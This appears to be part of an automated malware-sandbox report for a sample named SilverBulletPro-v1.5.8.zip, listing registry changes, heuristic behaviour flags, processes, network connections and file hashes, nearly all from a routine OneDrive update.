| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\INTERFACE\{2387C6BD-9A36-41A2-88ED-FF731E529384}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\odopen | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\odopen\shell\open | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\ = "SharedOverlayHandler Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\odopen\shell\open\command | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\INTERFACE\{D8C80EBB-099C-4208-AFA3-FBC4D11F8A3C}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\VersionIndependentProgID\ = "FileSyncClient.AutoPlayHandler" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\ = "FileSyncEx" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\ = "FileSyncEx" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\mssharepointclient\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\Microsoft.SharePoint.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ProgID\ = "FileSyncOutOfProcServices.FileSyncOutOfProcServices.1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\ = "UpToDateCloudOverlayHandler Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\0 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
/updateInstalled /background
Network
| Country | Destination | Domain | Proto |
| GB | 184.28.176.106:443 | | tcp |
| US | 8.8.8.8:53 | browser.pipe.aria.microsoft.com | udp |
| US | 52.182.143.213:443 | browser.pipe.aria.microsoft.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| NL | 52.111.243.30:443 | | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json
| MD5 | e516a60bc980095e8d156b1a99ab5eee |
| SHA1 | 238e243ffc12d4e012fd020c9822703109b987f6 |
| SHA256 | 543796a1b343b4ebc0285d89cb8eb70667ac7b513da37495e38003704e9d88d7 |
| SHA512 | 9b51e99ba20e9da56d1acc24a1cf9f9c9dbdeb742bec034e0ff2bc179a60f4aff249f40344f9ddd43229dcdefa1041940f65afb336d46c175ffeff725c638d58 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C7D95PAM\update100[1].xml
| MD5 | 53244e542ddf6d280a2b03e28f0646b7 |
| SHA1 | d9925f810a95880c92974549deead18d56f19c37 |
| SHA256 | 36a6bd38a8a6f5a75b73caffae5ae66dfabcaefd83da65b493fa881ea8a64e7d |
| SHA512 | 4aa71d92ea2c46df86565d97aac75395371d3e17877ab252a297b84dca2ab251d50aaffc62eab9961f0df48de6f12be04a1f4a2cbde75b9ae7bcce6eb5450c62 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
| MD5 | fb4aa59c92c9b3263eb07e07b91568b5 |
| SHA1 | 6071a3e3c4338b90d892a8416b6a92fbfe25bb67 |
| SHA256 | e70e80dbbc9baba7ddcee70eda1bb8d0e6612dfb1d93827fe7b594a59f3b48b9 |
| SHA512 | 60aabbe2fd24c04c33e7892eab64f24f8c335a0dd9822eb01adc5459e850769fc200078c5ccee96c1f2013173bc41f5a2023def3f5fe36e380963db034924ace |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
| MD5 | 75ff8f9aedfbbf792481c506f178840f |
| SHA1 | c6290e7a377ab78b8c28106e7aa3006103c338c1 |
| SHA256 | 6be141ed318b1ef79c51bb5cbd215b180af4db22898296b13abbb48ad7ee34df |
| SHA512 | a60ccd8bf2ae9dfb6e78fbf981ae20f1f28710d3557e3193c9b49cc6326dcf7336cd0360ed04c9d4617ba9780ad3946cdd61a8ae53d34f1464d8e2b9ab2158c1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
| MD5 | 1b7f41be49cc8f00b9125a5c358063d9 |
| SHA1 | cd61148961663d67c1569e01fadf9b782b83f027 |
| SHA256 | 5096a9beb0a2078ce0406a0fba7fc1739314beb902c6602ed6aa335ddb99dea2 |
| SHA512 | d9d90cd8a90ad8a95ad8fe70eab4d145fc6b7b592b91a7a85853097e069ef8cf985e516f5d9d7fb44d1897c9502c07fa9a4a5d4a1d3e9e329b053a36f8fbaee2 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\logs\DeviceHealthSummaryConfiguration.ini
| MD5 | 953162e6b5df240e85616a61770bc9ac |
| SHA1 | 7d2f189b3f41ea41e7b1ae3ec33a2a7a5a9287cc |
| SHA256 | c4236f3cb58ea6a3becae3c12f0d30f650eacbfa958504e1f8916561f77ecc23 |
| SHA512 | bf1fbf60e093d644fa456bf647cf0e9276e7b8ab1c34c27830478181c863a1ae67f5639004c64e23f944b67ddafc390b9f14fc62cd434f226bb0d50a013da3c0 |
C:\Users\Admin\AppData\Local\Temp\tmp9093.tmp
| MD5 | 5b16ef80abd2b4ace517c4e98f4ff551 |
| SHA1 | 438806a0256e075239aa8bbec9ba3d3fb634af55 |
| SHA256 | bbc70091b3834af5413b9658b07269badd4cae8d96724bf1f7919f6aab595009 |
| SHA512 | 69a22b063ab92ca7e941b826400c62be41ae0317143387c8aa8c727b5c9ee3528ddd4014de22a2a2e2cbae801cb041fe477d68d2684353cdf6c83d7ee97c43d4 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\Personal\logUploaderSettings_temp.ini
| MD5 | cc04d6015cd4395c9b980b280254156e |
| SHA1 | 87b176f1330dc08d4ffabe3f7e77da4121c8e749 |
| SHA256 | 884d272d16605590e511ae50c88842a8ce203a864f56061a3c554f8f8265866e |
| SHA512 | d3cb7853b69649c673814d5738247b5fbaaae5bb7b84e4c7b3ff5c4f1b1a85fc7261a35f0282d79076a9c862e5e1021d31a318d8b2e5a74b80500cb222642940 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-400.png
| MD5 | e01cdbbd97eebc41c63a280f65db28e9 |
| SHA1 | 1c2657880dd1ea10caf86bd08312cd832a967be1 |
| SHA256 | 5cb8fd670585de8a7fc0ceede164847522d287ef17cd48806831ea18a0ceac1f |
| SHA512 | ffd928e289dc0e36fa406f0416fb07c2eb0f3725a9cdbb27225439d75b8582d68705ec508e3c4af1fc4982d06d70ef868cafbfc73a637724dee7f34828d14850 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-200.png
| MD5 | 09773d7bb374aeec469367708fcfe442 |
| SHA1 | 2bfb6905321c0c1fd35e1b1161d2a7663e5203d6 |
| SHA256 | 67d1bb54fcb19c174de1936d08b5dbdb31b98cfdd280bcc5122fb0693675e4f2 |
| SHA512 | f500ea4a87a24437b60b0dc3ec69fcc5edbc39c2967743ddb41093b824d0845ffddd2df420a12e17e4594df39f63adad5abb69a29f8456fed03045a6b42388bc |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-150.png
| MD5 | de5ba8348a73164c66750f70f4b59663 |
| SHA1 | 1d7a04b74bd36ecac2f5dae6921465fc27812fec |
| SHA256 | a0bbe33b798c3adac36396e877908874cffaadb240244095c68dff840dcbbf73 |
| SHA512 | 85197e0b13a1ae48f51660525557cceaeed7d893dd081939f62e6e8921bb036c6501d3bb41250649048a286ff6bac6c9c1a426d2f58f3e3b41521db26ef6a17c |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-200.png
| MD5 | f1c75409c9a1b823e846cc746903e12c |
| SHA1 | f0e1f0cf35369544d88d8a2785570f55f6024779 |
| SHA256 | fba9104432cbb8ebbd45c18ef1ba46a45dd374773e5aa37d411bb023ded8efd6 |
| SHA512 | ed72eb547e0c03776f32e07191ce7022d08d4bcc66e7abca4772cdd8c22d8e7a423577805a4925c5e804ed6c15395f3df8aac7af62f1129e4982685d7e46bd85 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png
| MD5 | 22e17842b11cd1cb17b24aa743a74e67 |
| SHA1 | f230cb9e5a6cb027e6561fabf11a909aa3ba0207 |
| SHA256 | 9833b80def72b73fca150af17d4b98c8cd484401f0e2d44320ecd75b5bb57c42 |
| SHA512 | 8332fc72cd411f9d9fd65950d58bf6440563dc4bd5ce3622775306575802e20c967f0ee6bab2092769a11e2a4ea228dab91a02534beeb8afde8239dd2b90f23a |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png
| MD5 | 3c29933ab3beda6803c4b704fba48c53 |
| SHA1 | 056fe7770a2ba171a54bd60b3c29c4fbb6d42f0c |
| SHA256 | 3a7ef7c0bda402fdaff19a479d6c18577c436a5f4e188da4c058a42ef09a7633 |
| SHA512 | 09408a000a6fa8046649c61ccef36afa1046869506f019f739f67f5c1c05d2e313b95a60bd43d9be882688df1610ad7979dd9d1f16a2170959b526ebd89b8ef7 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png
| MD5 | 552b0304f2e25a1283709ad56c4b1a85 |
| SHA1 | 92a9d0d795852ec45beae1d08f8327d02de8994e |
| SHA256 | 262b9a30bb8db4fc59b5bc348aa3813c75e113066a087135d0946ad916f72535 |
| SHA512 | 9559895b66ef533486f43274f7346ad3059c15f735c9ce5351adf1403c95c2b787372153d4827b03b6eb530f75efcf9ae89db1e9c69189e86d6383138ab9c839 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png
| MD5 | 2c7a9e323a69409f4b13b1c3244074c4 |
| SHA1 | 3c77c1b013691fa3bdff5677c3a31b355d3e2205 |
| SHA256 | 8efeacefb92d64dfb1c4df2568165df6436777f176accfd24f4f7970605d16c2 |
| SHA512 | 087c12e225c1d791d7ad0bf7d3544b4bed8c4fb0daaa02aee0e379badae8954fe6120d61fdf1a11007cbcdb238b5a02c54f429b6cc692a145aa8fbd220c0cb2d |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png
| MD5 | f4e9f958ed6436aef6d16ee6868fa657 |
| SHA1 | b14bc7aaca388f29570825010ebc17ca577b292f |
| SHA256 | 292cac291af7b45f12404f968759afc7145b2189e778b14d681449132b14f06b |
| SHA512 | cd5d78317e82127e9a62366fd33d5420a6f25d0a6e55552335e64dc39932238abd707fe75d4f62472bc28a388d32b70ff08b6aa366c092a7ace3367896a2bd98 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-400.png
| MD5 | e593676ee86a6183082112df974a4706 |
| SHA1 | c4e91440312dea1f89777c2856cb11e45d95fe55 |
| SHA256 | deb0ec0ee8f1c4f7ea4de2c28ff85087ee5ff8c7e3036c3b0a66d84bae32b6bb |
| SHA512 | 11d7ed45f461f44fa566449bb50bcfce35f73fc775744c2d45ea80aeb364fe40a68a731a2152f10edc059dea16b8bab9c9a47da0c9ffe3d954f57da0ff714681 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-200.png
| MD5 | 13e6baac125114e87f50c21017b9e010 |
| SHA1 | 561c84f767537d71c901a23a061213cf03b27a58 |
| SHA256 | 3384357b6110f418b175e2f0910cffe588c847c8e55f2fe3572d82999a62c18e |
| SHA512 | 673c3bec7c2cd99c07ebfca0f4ab14cd6341086c8702fe9e8b5028aed0174398d7c8a94583da40c32cd0934d784062ad6db71f49391f64122459f8bb00222e08 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-150.png
| MD5 | a23c55ae34e1b8d81aa34514ea792540 |
| SHA1 | 3b539dfb299d00b93525144fd2afd7dd9ba4ccbf |
| SHA256 | 3df4590386671e0d6fee7108e457eb805370a189f5fdfeaf2f2c32d5adc76abd |
| SHA512 | 1423a2534ae71174f34ee527fe3a0db38480a869cac50b08b60a2140b5587b3944967a95016f0b00e3ca9ced1f1452c613bb76c34d7ebd386290667084bce77d |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-125.png
| MD5 | d03b7edafe4cb7889418f28af439c9c1 |
| SHA1 | 16822a2ab6a15dda520f28472f6eeddb27f81178 |
| SHA256 | a5294e3c7cd855815f8d916849d87bd2357f5165eb4372f248fdf8b988601665 |
| SHA512 | 59d99f0b9a7813b28bae3ea1ae5bdbbf0d87d32ff621ff20cbe1b900c52bb480c722dd428578dea5d5351cc36f1fa56b2c1712f2724344f026fe534232812962 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-100.png
| MD5 | 57a6876000151c4303f99e9a05ab4265 |
| SHA1 | 1a63d3dd2b8bdc0061660d4add5a5b9af0ff0794 |
| SHA256 | 8acbdd41252595b7410ca2ed438d6d8ede10bd17fe3a18705eedc65f46e4c1c4 |
| SHA512 | c6a2a9124bc6bcf70d2977aaca7e3060380a4d9428a624cc6e5624c75ebb6d6993c6186651d4e54edf32f3491d413714ef97a4cdc42bae94045cd804f0ad7cba |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.scale-125.png
| MD5 | 09f3f8485e79f57f0a34abd5a67898ca |
| SHA1 | e68ae5685d5442c1b7acc567dc0b1939cad5f41a |
| SHA256 | 69e432d1eec44bed4aad35f72a912e1f0036a4b501a50aec401c9fa260a523e3 |
| SHA512 | 0eafeaf735cedc322719049db6325ccbf5e92de229cace927b78a08317e842261b7adbda03ec192f71ee36e35eb9bf9624589de01beaec2c5597a605fc224130 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\OneDrive.VisualElementsManifest.xml
| MD5 | 5ae2d05d894d1a55d9a1e4f593c68969 |
| SHA1 | a983584f58d68552e639601538af960a34fa1da7 |
| SHA256 | d21077ad0c29a4c939b8c25f1186e2b542d054bb787b1d3210e9cab48ec3080c |
| SHA512 | 152949f5b661980f33608a0804dd8c43d70e056ae0336e409006e764664496fef6e60daa09fecb8d74523d3e7928c0dbd5d8272d8be1cf276852d88370954adc |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Resources.pri
| MD5 | 7473be9c7899f2a2da99d09c596b2d6d |
| SHA1 | 0f76063651fe45bbc0b5c0532ad87d7dc7dc53ac |
